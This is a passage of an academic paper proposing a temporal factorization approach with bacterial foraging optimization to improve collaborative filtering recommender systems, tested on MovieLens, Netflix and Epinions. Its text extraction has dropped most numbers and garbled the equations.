qti are integrated in numerous mathematical equations such as those in temporal approaches (koren, ; ye & eskenazi, ) and factorization methods (al-hadi et al., ; han et al., ; yuan, zahir & yang, ). for instance, the baseline factor and the distance between rating scores and baseline values of neighbors who supply their rating scores for each product are combined by the neighbors based baseline method (bell & koren, ) as presented in eq. ( ). <̂ui=bu+ ∑ x∈ni simxrxibxi∑ x∈ni simx , ( ) where simx is the similarity rate of customer x with the target customer, n is the set of customers who rate product i, rxi is the rating score provided by user x for item i, and bxi is the baseline value. currently, the temporal recommendation methods are used to suggest products to customers at an appropriate time. these are applied in many prediction techniques to make an accurate forecast. note that time is considered an important factor in making final decisions. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. temporal-based approaches time is a very important factor in learning customers’ interests and tracking products’ popularity decay. the temporal preferences with matrix factorization have been used to develop efficient collaborative-based schemes in addressing the issues of sparsity, drift, and decay. for example, the temporal dynamics approach (koren, ) utilizes the factorization factors, bins (static temporal periods), and global weight to learn the temporal preferences and minimize the overfitted predicted scores. however, it neglects the fact that users’ preferences change over time. hence, the overall weights are not accurate as a result of personalization. the long-term preferences long-term preferences differ from short-term preferences with regards to how they are applied. in a session (i.e., a week, month, or season), the recorded preferences are considered short-term preferences. on the other hand, the baseline factors and the long- term preferences are exploited in the long-term approach (ye & eskenazi, ). this is expressed in eq. ( ), where τs, τe and τui are the first, last and current time that a product i is rated by a customer u, respectively. this approach addresses the drift in customers’ preferences over the long-term but it does not address the popularity decay of products. <̂ui=µ+bu τe−τui τe−τs +bi τui−τs τe−τs +puq t i . ( ) <̂ui= ( µ+buωu+biωi+puq t i ) +gix [ (buωu) + ∥∥pu∥∥ +(biωi) +∥∥qti ∥∥ ], ( ) where gix is the weight of cluster x for item i that is updated by bfoa, pu and ∥∥pu∥∥ are the latent factor and norm of latent factor of customer u, while qti and ∥∥qti ∥∥ are the latent factor and the norm of latent factor of product i, respectively. moreover, the personal long-term factors are defined by ωu and ωi in eqs. ( ) and ( ), respectively. ωu=exp ( − τue −τ u s τue ) , ( ) ωi=exp ( − τ ie−τ i s τ ie ) , ( ) where τue and τ u s are the last and the first time customer u provided a rating scores, and τ is and τ i e are the first and the last time the group of customers offers scores for product i, respectively. nevertheless, the long temporal approaches (al-hadi et al., b; ye & eskenazi, ) have not addressed issues such as the drift and the popularity decay by considering the short-term preferences. this lowers the prediction performance of the cf technique. the long temporal-based factorization approach (al-hadi et al., b) learns the long-term preferences by integrating genres with factorization features to address sparsity and decay issues. however, this approach falls short of incorporating the drift in customers’ preferences which lowers the prediction accuracy of the cf. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the short-term preferences the temporal dynamics approach (koren, ) is used for predicting missing ratings by integrating the temporal weights with the different factorization factors. this approach minimizes the overfitted predicted scores during the optimization process using a global weight. however, it does not properly characterize personalized feedback. the short-term based latent method (yang et al., ) learns the short-term preferences from the hidden feedback of neighbors’ preferences during a session. however, this approach is not a lasting solution, especially due to long-term, drift, and popularity decay. similarly, the temporal integration approach (ye & eskenazi, ) integrates the long and short preferences with the baseline features to solve the drift issue. this approach is also limited by personalization, understanding the drift in users’ preferences, and items’ popularity decay over time. the short-term based baseline (ye & eskenazi, ) incorporates the baseline values of neighbors during a session with other factorization factors as shown in eq. ( ). <̂ui(t)=bui+ ∑ j∈ν(u,t)[(ruj−buj)$ij] √ |ν(u,t)| +puq t i , ( ) where $ij is the applied weight that decreases the overfitting predicted values, ν(u,t) is the set of products ranked by customer u during time interval t (e.g., the month of july), and∑ j∈ν(u,t)[(ruj−buj)$ij] shows the whole difference between the rating scores by customer u for a set of products during time t and the baseline values. given the soaring ratio in the sparse values in the ranking matrix, the short-term methods are not efficient in learning short-term preferences. products and costumers’ preferences are learned through the short temporal-based factorization method (al-hadi et al., a) to address the drift issue and improve the prediction accuracy of cf. however, product popularity decay is ignored in this approach. short-term preferences are represented using the temporal convergence among the customers. these are exploited for the minimization of overfitting for the predicted rating scores as shown in eq. ( ), where >xu is the temporal weight that is optimized according to the location of cluster number x that represents the short-term period. however, the prediction function of cf decreases due to the inability of the short-term methods to cover the drift and decay problems during the period. as such, the long and short-term preferences must be integrated to address all the issues in the recommendation system. <̂ui= ( µ+> x ubu+bi+puq t i ) +> x u [ b u+ ∥∥pu∥∥ +b i +∥∥qti ∥∥ ]. ( ) summarily, the existing temporal-based approaches have addressed several limitations of recommender systems such as sparsity (zhang et al., a; idrissi & zellou, ; chu et al., ), drift issue (rabiu et al., ; al-hadi et al., a) and time decay issue (koren, ; ye & eskenazi, ; al-hadi et al., b). each reviewed approach in this article has one or two research gaps, e.g., learning the personalized features, the drift preferences, and the popularity decay. there is currently no approach that considers all these issues (table ). therefore, this work introduces the lto approach for learning the features related to all these issues. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of temporal-based approaches according to the solved issues. temporal-based approach sh or t- t er m lo n g- t er m sp ar si ty d ri ft d ec ay neighbors-based baseline (bell & koren, ) x temporal dynamics (koren, ) x x x x ensemble divide and conquer (al-hadi et al., ) x short-term based latent (yang et al., ) x temporal integration (ye & eskenazi, ) x x x long temporal-based factorization (al-hadi et al., b) x x x short temporal-based factorization (al-hadi et al., a) x x x latent-based temporal optimization approach the lto approach addresses both long and short temporal preferences by using factorization to solve issues of preference drift and popularity decay (alg ). lto applies rmse, cosine, and prediction functions to assess the temporal preference representation. the key empirical setting of the temporal-based factorization method and the proposed solution framework are presented in fig. . bfoa is exploited to capture the preferences of a short duration. by applying k-means, the timestamp convergence deals with short durations in the time matrix. the number of clusters k is recognized based on the number of short durations in the entire period. generally, bacteria cannot track the drift and the time decay perfectly during the short-term without considering the long-term. therefore, the integration of the long and short durations represents the accurate solution for solving the limitations of the drift and the time decay. in fig. , we present an example of how to create the bacteria members by applying the k-means method. in this example, the clusters’ number is assigned for each of the users’ and items’ features. based on the time convergence between the products (columns) and customers (rows), four bacteria members are shown in fig. . the standard bfoa is utilized in the lto process to detect the temporal conducts of customers and products. bfoa members initialize the short-term weights using random values. the lto approach changes these weights throughout the lifecycle of bfoa dynamically based on the positive effect it has on learning stages. the weights of bacteria members >ux and > i y are updated dynamically throughout the learning iteration. this provides a novel tracking of users’ interests in the items. the lto uses eq. ( ) to reduce the overfitted predicted scores throughout the learning iteration. dui= ( µ+> u xbuωu+> i ybiωi+puq t i ) , ( ) where>ux and> i y indicate the short temporal weights indexed by clusters x and y. user u is indexed by cluster x and item i is indexed by cluster y. the values of>ux and> i y are updated in each iteration according to the positive effect in developing the accuracy prediction of the al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm latent-based temporal optimization data preparation based on personalization ratingmatrix,timematrix ←assign the active user ←data set learning latent and baseline vectors matrixvec ←µ,bu,bi,pu,qti ←baseline,svd←ratingmatrix matrixvec ← ∥∥pu∥∥ ,∥∥qti ∥∥ ←∥∥pu∥∥=√∑mu= (pu) ,∥∥qti ∥∥ ,∥∥qti ∥∥=√∑ni= (qti ) matrixvec ←ωu←ωu=exp ( − τue −τ u s τue ) ←τus ,τ u e ←timematrix matrixvec ←ωi←ωi=exp ( − τ ie−τ i s τ ie ) ←τ is,τ i e ←timematrix assign the number of short durations #d←number of days←total duration of dataset #oneweek←#d/ ,#twoweeks←#d/ ,#onemonth←#d/ #oneseason←#d/ ,#oneyear ←#d/ learning short-term features of users by #onemonth assign the number of clusters based on the number of short duration of users x ←#onemonth temporal index of users←k−means(timematrix,x) [> x ,> x ,...,> x u]←temporal index of users learning short-term features of items by #onemonth assign the number of clusters based on the number of short duration of items y ←#onemonth temporal index of items←k−means(timematrix,y) [> y ,> y ,...,> y i ]←temporal index of items create bacteria combining the temporal features of users and the temporal features of items in one matrix [> x ,> x ,...,> x u,> y ,> y ,...,> y i ]←[> x ,> x ,...,> x u]and[> y ,> y ,...,> y i ] assign the variables of the training process assign rmseoptimum and iteration number initialize random values for s bacteria repeat predicting the sparse scores in ratingmatrix updatedbacteria ←training the weights of short-term [>x ,...,> x u,> y ,...,> y i ] using bfoa dui,fu,gi←equations , , ←updated bacteria, matrixvec, rating matrix rating matrix with predictions←<̂ui=dui+fu+gi cf technique←rating matrix with predictions similarity values←cosine function←cf technique predicted values for items←prediction function← similarity values rmse value←rmse function←predicted values for items and scores of ac- tive user until rmse <=rmseoptimum or complete the iteration loop al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure latent-based temporal optimization framework. full-size doi: . /peerjcs. /fig- figure an example of bacteria members initialization. full-size doi: . /peerjcs. /fig- cf method. the vectors ωu and ωi are the long-temporal independent weights of customer u and product i while bu, bi, pu, qti represent the baseline and factorization variables. the second contribution of lto is tracking users’ drifting interests. this is learned by focusing on the time associated with users’ interests as represented by eq. ( ). fu=> u x [ (buωu) + ∥∥pu∥∥ ], ( ) al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. where ∥∥pu∥∥ represents the norm value of user’s latent factor and>ux is updated according to the positive effects of changing users’ interests throughout the learning process. the third contribution of lto is tracking the popularity decay of items throughout the learning process by focusing on the time popularity of items as shown in eq. ( ). gi=> i y [ (biωi) + ∥∥qti ∥∥ ], ( ) where ∥∥qti ∥∥ is the norm factorization variable of items and >iy is updated according to the improvement achieved through the learning iteration which affects the baseline values and norm factorization features of items. furthermore, bfoa learns the significance of each short-term period by applying the rmse (which acts as the fitness value). these contributions are combined in eq. ( ) to predict the unknown values within the rating matrix. <̂ui=dui+fu+gi. ( ) the bfoa operates in three stages: chemotaxis, reproduction, and removal and distribution. the first stage involves seeking the closest nutrition source by the bacteria. this is accomplished by swimming or tumbling or alternating between swimming and tumbling to change direction during the generation. in this process, the flagella of the bacteria make clockwise rotations to choose another path so that rich nutrients in the surrounding can be obtained. the tumbling stage is expressed in eq. ( ). τ i(j+ ,k,l)=τ i(j,k,l)+ci+ θ√ θti θi , ( ) where τ is the short-term features of one bacterium, the variables i, j, k and l symbolize i-th bacterium at j-th chemotactic, k-th reproduction and l-th elimination and dispersal steps. ci is the walk length in an irregular direction, i is a random value oncterium number i at j-th chemotactic, k-th reproduction and [- , ], and √ ti i is the unit walk in the irregular direction. swimming follows tumbling whenever the flagella of bacteria make the counterclockwise rotation to move in a particular direction. the bacteria continue swimming in the same direction if the nutrients are rich and the alternation between tumbling and swimming is repeated until the chemotactic stage is complete. the swarming function utilizes a sensor to provide signals in a nutrient-rich environment. when the signal indicates a poor nutrient or a dangerous location, the bacteria shift from the center to the outward direction with a moving ring of the members. if the nutrient has a high level of succinate, the bacteria subsequently neglect aspartate attractant and concentrate in groups. the bacteria provide an attraction signal for the all members so that they swim together. the bacteria move in a concentric pattern with a high density. the outward movement of the ring and the native releases of attractant constitute the spatial order (kim & abraham, ). the swarming stage is represented mathematically as shown in eq. ( ). τ i(j+ ,k,l)= s∑ i= −dattr exp(wattrβ)+ s∑ i= −hrepexp(wrepβ), ( ) al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where s denotes the number of bacteria and β is the summation of short-term features that can be learned by the members of bacteria i as shown in eq. ( ). the attractant depth dattr denotes the magnitude of excretion by a cell, attractant width wattr denotes how the chemical cohesion signal spreads, repellent height hrep and width wrep determine the size of optimization space where the cell is related to the dispersal of chemical signal. β= p∑ m= (τm−τ i m) , ( ) where p denotes the number of short-term features, τm denotes the short-term feature number m learned during the chemotaxis process whileτ im is the short-term feature number m learned during the chemotaxis process by bacteria i. in the reproduction stage, the health of bacteria is calculated according to the fitness value of each bacterium. the bacteria values are then sorted in an ascending order in the array. the fitness value provided by rmse is extracted from the optimization area in the recommendation system (that is based on collaborative filtering). the lower half bacteria with poor foraging die and the upper half bacteria (having better foraging) are copied into two parts. each part has the same values al-hadi et al. ( a). this procedure keeps the bacterial population constant. the bacterial health can be calculated using eq. ( ). j ihealth= nc+ ∑ j= j(i,j,k,l), ( ) where j ihealth is the healthy score of the short-term preference that can be learned by bacteria i, the number of chemotactic, reproduction and removal steps are j, k and l, respectively. provision for the possibility of the ever-changing status of a few bacteria is carried out in the third step (removal and distribution). here, the rise order involves the arrangement and generation of the random vector. the bacteria are organized based on their health values. moreover, the randomly generated locations are used to change the locations of the bacteria in the optimization domain. these locations are recognized as the prominent available locations. after the generation, the best result in each repetition is approved as the final (correct) result. in this work, the bfoa is integrated with the k-means clustering algorithm and matrix factorization approach. the k-means acts as a clustering algorithm used to control the big optimization space based on members’ personal features. it is used to reduce the large number of members to a small number of clusters. these clusters are then controlled using a weight for each cluster to control the optimization domain. applying the natural choice in the course of repeating generations, the bfoa decreases the number of poor foraging members and increases the number of rich foraging strategies (al-hadi, hashim & shamsuddin, ). after several generations, the poor foraging members are removed or transformed to skilled members. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. experimental settings the cf technique is used to predict the interest of an active user. this takes into account the calculated similarity values between the rating scores of common users (neighbours) and the active user. however, sparse rating scores in the rating matrix negatively affect the prediction accuracy of the cf technique. thus, this research work aims to improve the prediction of sparse rating scores in the rating matrix of each active user. the data sparsity is an important issue which this research aims. the factorization approaches (including temporal-based factorization) are used to predict missing rating scores in the rating matrix which improves the prediction accuracy of cf. the percentage accuracy can be measured using rmse function where the lower values of rmse refers to the accurate predicted values for the missing rating score in the rating matrix and also refers to the heights accuracy prediction of the recommendation list of items that can provided to the active user. datasets to demonstrate the performance of lto, three real-world datasets are used: movielens, netflix, and epinions. several experimental studies have utilized movielens [ ], netflix prize [ ], and epinions [ ] to predict the performances of recommendation systems. a brief description of the three datasets is given in table . the customers of these datasets assign a rating score from to to the movie or product, where to indicate an unliked product and to indicate a liked product. in the concluding experiments, the sparsity level of each dataset is considered to show its effect on the prediction performance of these datasets. the sparsity level is computed by eq. ( ) (abdelwahab et al., ), where #rating is the score provided by users from to and #total is the product of #customers and #products. sparsitylevel = − #rating #total . ( ) normalization data normalization is used in data transformation to reprocess the data with the aim of enhancing the precision and effectiveness of mining methods and distance calculations (al-hadi et al., ). in recommender systems, the scores of customers for products are within – . however, this range may result in low prediction accuracy. thus, the rating scores are normalized to a range ( – ) to reduce the prediction error. table shows the values of the original scores and the normalized scores. k-means and bfoa setting table shows the number of clusters for the k-means clustering method and the short-term periods for the three datasets. the movielens contains data for four periods (i.e., one day, one week, two weeks, and one month) while netflix contains an additional two periods (i.e., one season and one year). for instance, the entire period of netflix is about days which can be divided by days to get seasons. here, the cluster number (i.e., ) is assigned to represent the users’ activities throughout the temporal convergence of seasons. the k-means algorithm will divide the activities of users in the time matrix into al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table experimental datasets. movielens netflix prize epinions trustlet #customers , , #products , , , #rating , , , , sparsity level . . . date – – #periods months years months temporal vector #seconds #days #months products movie movie product table the normalization of the rating scores. type range rating scores original [ – ] normalized [ – ] . . . . table the k-means clustering method and short-term periods for different datasets. datasets # days periods # clusters ( k) success clustering movielens one month x two weeks x one week x one day epinions one month x two weeks x one week netflix one year x one season x one month x two weeks clusters. similarly, the interest-time for items in the time matrix will be divided into clusters. however, when the number of clusters is greater than the number of customers in some rating matrices (e.g., two weeks period), netflix will not be appropriate for grouping by the k-means algorithm. the periods of one month and one season are applied by epinions. the one-week period is not considered as it is not suitable for epinions temporal feature (al-hadi et al., b). the period of two weeks by netflix is inappropriate for k-means clustering algorithm (al-hadi et al., a). therefore, in the netflix dataset, three temporal periods are used (i.e., one year, one month, and one season). the bfoa factors and their values are determined according to the proper empirical execution of the lto approach in table . in addition, a value is selected from the numbers of clusters using the p parameter as demonstrated in table . al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the parameters values of bfoa. parameters no parameters no no. of bacteria groups s elimination-dispersal l the length of a swim wrep run length unit ci . wattr . no. of iteration probability of elimination-dispersal . optimum rmse . dattr . no. of chemotactic steps j hrep . reproduction steps k rmse value reduction the lto approach extracts the short-term features by deploying bfoa which uses the temporal convergence in the time matrix of a short duration. for instance, the number of months in each active user’s time matrix is considered to divide the time matrix into k-weighted clusters. the bfoa trains the clusters’ weights to reduce the overfitted predicted scores according to the smallest rmse. the weights of a short duration are optimized based on the positive effects on the factorization factors. this way, the prediction accuracy of the cf technique is achieved. the factorization factors are extracted from a rating matrix and fixed values are provided for all iterations of the optimization process. the swarming action of bacteria provides sensor values that are integrated with rmse to guide the members of bacteria into the direction of the rich nutrient or to avoid the detrimental area. short-term periods are determined from the time of all preferences in each experimental dataset and their effects are shown under two kinds of scoring scales. table is an example of drift learning based on overfitting values minimization. in this example, each row contains the active user’s id and the rmse values for iterations. the lowest rmse value is selected by ensemble selection and saved in the last column of this table. the optimum temporal weights are also saved according to the selected rmse value. average rmse values for iterations (column by column) are shown in the last row. the value in the last cell is the lowest average rmse value of the test-set members ( . ). this will be used for comparing the prediction performance of lto with the benchmark schemes. the lto learns the temporal weight of each user using the personality activation of the users who rated the set of items during the long-term. similarly, the lto learns the temporal weight of each item based on the personality activation of the set of users who rated the item during the long-term. the temporal weights of the long duration are incorporated in the baseline model to determine the interest of customers and the popularity of products. in addition, the short duration weights are learned by the lto approach. this is achieved using minimized overfitting. lto learns the drift and time decay features during the optimization process. this lto approach improves the performance of the cf technique throughout the iteration loop by learning the accurate predicted sparse rating score values in the rating matrix which reducing the rmse values. in the next section, the effect of lto approach in learning the temporal features will be examined under the scoring of [ – ] and [ – ]. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table an example of how lto reduces rmse values in movielens under scoring [ - ]. user iteration number min rmse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . avg. rmse . . . . . . . . . . . table average personal vectors of the test-set matrices. test-set movielens netflix epinions number of the rating matrices avg. no. of customers avg. no. of products avg. no. of rating scores > avg. no. of total rating scores >= avg. percentage of sparsitylevel . % . % . % experimental results this section discusses the performances of the benchmark and the proposed approaches for improving the cf prediction performance technique under two scoring scales which are [ – ] and [ – ]. the efficacy of lto in resolving the decay and drift issues by reducing the rmse values are also discussed. table shows the personal vectors of the test-set matrices that can impact the experimental results. there are rating matrices for movielens which are selected by the sequence , , , ....., for the test-set. each matrix in the test-set has different numbers of rows and columns. the sparsity levels are compared with other matrices to provide unique results for each rating matrix. the average numbers of these matrices and their factors are used for performance evaluation in the experiments. lto approach under the scoring [ – ] the lto approach is applied to five short-term periods (which are a week, two weeks, a month, and a year) according to the tested dataset under the rating scale [ – ]. figures – demonstrate the prediction accuracy while performing the iterations on the datasets. figure shows that the two weeks period in movielens has a higher prediction accuracy during – iterations compared to one week and one month. users’ activities during the long and short duration preferences are best learned within the two weeks period. this makes it an accurate short-term preference. in fig. , the period of one month in the epinions dataset has a higher prediction accuracy during iterations to compared to the period of one season. here, one month is an accurate short-term period. this period has the best short and long-term performances compared to one season. one year period in netflix provides a greater al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure lto prediction accuracy improvement of cf for movielens. full-size doi: . /peerjcs. /fig- prediction performance from iterations to in fig. . across iterations to , the period of one year is more precise than one month but less than the period of one season. the temporal attitudes are learned by the lto approach over iterations. this helps to achieve precise predictions by optimizing the temporal weights of each duration. the periods of netflix are years, seasons or months. experimental results show that lto, in one season, achieved the highest prediction performance compared to its predicted performance using the year and month periods. this is because the duration of a season is an intermediate between a month and a year. moreover, various customers’ activities are performed therein. lto approach under the scoring [ – ] this subsection demonstrates the normalizing effect on the performance of lto for reducing the rmse under the scoring [ - ]. figures , and track the effects of the temporal vectors in improving the prediction accuracy of the cf using the lto approach. figure indicates that the rmse of movielens for a week is better than that of a month under the rating scale [ – ]. additionally, the rmse during the period of two weeks is the best compared to those of a week and a month. this emphasizes the significance of the two-week period in learning the drift of customers’ interests and products’ popularity time decay. figure shows the prediction accuracy using epinions, here, the period of one month has a significant effect on reducing the rmse in iterations to compared to the effect of one season. in figure , the effect of a season using netflix is equivalent to the effect of a year but more than the effect of a month during iterations to . iterations to has the al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure lto prediction accuracy improvement of cf for epinions. full-size doi: . /peerjcs. /fig- figure lto prediction accuracy improvement of cf for netflix. full-size doi: . /peerjcs. /fig- sharpest accuracy prediction in the season compared to the period of one year and one month. figures – show the potential of bfoa in learning the temporal features by swarming in the dimensional time-space. the effects of the equivalent time periods show that the customers’ interests and the products’ popularity changed during these periods. the proposed approach will be evaluated by the current factorization and temporal approaches in the next subsection. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure lto prediction accuracy improvement of cf for movielens. full-size doi: . /peerjcs. /fig- figure lto improves accuracy prediction of cf for epinions. full-size doi: . /peerjcs. /fig- comparison of the performances of cf, mf, and temporal-based approaches in this subsection, the lto approach is evaluated by comparing its effectiveness in reducing rmse values with other benchmark approaches. both lto and the benchmarks are used to predict the sparse scores as they all lower the rmse values. note that the lower the rmse value, the higher the prediction accuracy of the cf approach. in table , seven approaches are implemented to benchmark the prediction performance of lto. the improvement in the prediction performance of the cf technique is represented by two scoring scales: [ – ] al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure lto prediction accuracy improvement of cf for epinions. full-size doi: . /peerjcs. /fig- and [ – ]. first, the scores from to are provided by the users of the three experimental datasets, and the benchmarks are categorized into three parts. the first part contains the prediction accuracy of the cf technique by rmse for the rating matrix of the active user without predicting the sparse rating scores. the second part contains the prediction accuracy of the cf by two factorization approaches which are neighbour-based baseline (bell & koren, ) and the ensemble divide and conquer (al-hadi et al., ). these approaches are used to solve the sparsity issue and as well learn the accurate factorization features. from the evaluations, it is observed that the prediction performance of ensemble divide and conquer is better than that of the cf and the neighbours-based baseline approach. however, the approaches in the second category have weaknesses in learning the overfitted predicted scores and temporal issues (such as drift and decay). for the third category, five temporal approaches are used to solve five issues i.e., sparsity, accurately learning latent features, overfitting, drift, and decay. the temporal dynamics (koren, ) has a good prediction performance in solving these issues but it has a weakness in learning the personalized features using the equaled time slices. temporal integration using netflix performs better compared to temporal dynamics and short-term based latent approach. however, temporal integration has a weakness with respect to drift and decay. short temporal-based factorization (al-hadi et al., a) addresses all issues except popularity decay. it improves the prediction performance of the cf technique when compared to the above approaches using movielens and netflix. the performance of the short temporal-based factorization approach is lower than that of the ensemble divide and conquer approach using the epinions dataset because the recorded timestamp factors are registered using the number of months only (which represent weak temporal al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table the rmse of several prediction approaches using three datasets. approach scoring [ – ] scoring [ – ] movielens epinions netflix movielens epinions netflix cf . . . . . . neighbors based baseline (bell & koren, ) . . . . . . ensemble divide and conquer (al-hadi et al., ) . . . . . . temporal dynamics (koren, ) . . . . . . short-term based latent (yang et al., ) . . . . . . temporal integration (ye & eskenazi, ) . . . . . . short termporal based factorization (al-hadi et al., a) . . . . . . lto . . . . . . features). distinctively, the lto approach addresses all issues including the limitations in the benchmark schemes. it improves the prediction performance of the cf technique through a perfect combination of various factorization and temporal features. it also tracks the drift of users and the decay of items throughout the learning process. table shows that lto exhibits superior prediction performance when compared to all benchmarks. the normalization process for rating scores has reduced the rmse values by almost % due to the percentage difference between the rating scores [ – ] and [ – ]. for example, the percentage difference of lto approach in movielens is calculated using eq. ( ). percentage difference= − scoring scale −scoring scale scoring scale , ( ) where scoring scale is from to and scoring scale is from to . the percentage difference between . and . is . %. figure indicates the high prediction accuracy achieved by the lto approach for the three datasets when compared with the benchmark methods. additionally, the graphs show the positive impact of the normalization in reducing the rmse by around %. comparison of the output prediction scores of cf and lto the cf technique utilizes the similarity function to calculate the similarity between the active user and the common users or neighbors. in the second stage, cf utilizes the prediction function according to the similarity values to recommend items to the active user. however, cf’s predicted scores are not accurate because of the sparsity values in the rating matrix. this is solved using the lto approach. table is an example showing the improved accuracy of the predicted scores achieved by the lto approach. in this example, the short duration is one year. active users rate items from to , where and indicate unlike items while , , and indicate the liked items. the cf predicts rating scores from . to . . this provides the active users with recommended and unrecommended items (denoted by r and n, respectively in table ). on the other hand, the lto approach predicts rating scores from . to . which provides more accurate prediction compared to the cf. figure visualizes the output in table and indicates the high prediction performance of the lto approach. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the normalisation effects on the prediction accuracy of cf. lto provides the highest accuracy prediction for the cf under scoring [ – ]. full-size doi: . /peerjcs. /fig- table feedback prediction scores by cf and lto approaches. items i i i i i i i i i i i i i i active user cf . . . . . . . . . . . . . . r r r r r r r r r n r n r r lto . . . . . . . . . . . . n r n n n r n n r n r r r r figure feedback prediction scores by cf and lto approaches. full-size doi: . /peerjcs. /fig- al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. conclusion the cf performance is affected by several factors including changes in the customer’s taste, time decay in the popularity of products, data sparsity, and the overfitting in the predicted rating scores. prior research has attempted to enhance the cf’s prediction function by integrating the long and short-term preferences via the temporal interaction method (ye & eskenazi, ) with the factorization factors. however, the achievement is low. the goal of the long temporal-based factorization approach (al-hadi et al., b) is to solve the popularity decay problem and understand the drifting taste of clients over the long-term. on the other hand, the main focus of the short temporal-based factorization approach is to understand the behaviors of customers and solve the drift issue in the short-term. nonetheless, there are several limitations associated with predicting popularity decay issues as well as the drift in customers’ preferences over time. to address these problems, the lto approach presented in this paper integrates both short and long-term preferences. it utilizes the k-means and bfoa method which derived the fitness value by combining the signal and rmse values. the swarming function represents the preferences of the short-term based on the sensitivity of bacteria to rich nutrients or dangerous signals. according to the empirical findings, a higher prediction precision is achieved by the lto approach compared to the benchmark approaches. this is attributed to the temporal-based factorization approach and its ability to enhance the accuracy of the cf technique by understanding the temporal behaviors in both long and short preferences. possible extensions of this work include integrating the lto approach with other factorization features such as neighbors’ latent feedbacks. this would contribute to addressing issues such as the cold start when recommending new items to active users. besides, the genre’s features of movies can be integrated with the factors that are utilized by lto approach for the purpose of addressing challenges of new items by the movielens and yahoo! music datasets. additional information and declaration funding this publication is funded by the asian office of airforce research and development (aoard) through a project on deep recurrent q learning for recommendation system. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: the asian office of airforce research and development (aoard) through a project on deep recurrent q learning for recommendation system. competing interests the authors declare there are no competing interests. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • ismail ahmed al-qasem al-hadi conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, developed the solutions proposed, and approved the final draft. • nurfadhlina mohd sharef conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, supervised and lead the project, and approved the final draft. • md nasir sulaiman and norwati mustapha conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • mehrbakhsh nilashi analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: codes are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abdelwahab a, sekiya h, matsuba i, horiuchi y, kuroiwa s. . feature optimiza- tion approach for improving the collaborative filtering performance using particle swarm optimization. journal of computational information systems ( ): – . al-badarneh amer , ali mostafa smg. . an improved classifier for arabic text. journal of convergence information technology : – . al-hadi iaa-q, hashim szm, shamsuddin smh. . bacterial foraging optimiza- tion algorithm for neural network learning enhancement. in: th international conference on hybrid intelligent systems (his). piscataway: ieee, – . al-hadi iaa-q, sharef nm, nasir sm, norwati m. a. temporal based factorization approach for solving drift and decay in sparse scoring matrix. in: international conference on soft computing and data mining. cham: springer, – . al-hadi iaa-q, sharef nm, sulaiman mn, mustapha n. . ensemble divide and conquer approach to solve the rating scores’ deviation in recommendation system. journal of computational science ( ): – doi . /jcssp. . . . al-hadi iaa-q, sharef nm, sulaiman mn, mustapha n. a. bacterial foraging opti- mization algorithm with temporal features to solve data sparsity in recommendation system. in: proceedings of the second international conference on internet of things, data and cloud computing. – . al-hadi iaa-q, sharef nm, sulaiman mn, mustapha n. b. review of the temporal recommendation system with matrix factorization. international journal of innova- tive computing, information and control ( ): – . al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /jcssp. . . http://dx.doi.org/ . /peerj-cs. al-hadi iaa-q, sharef nm, sulaiman mn, mustapha n. b. temporal-based approach to solve item decay problem in recommendation system. advanced science letters ( ): – doi . /asl. . . alhijawi 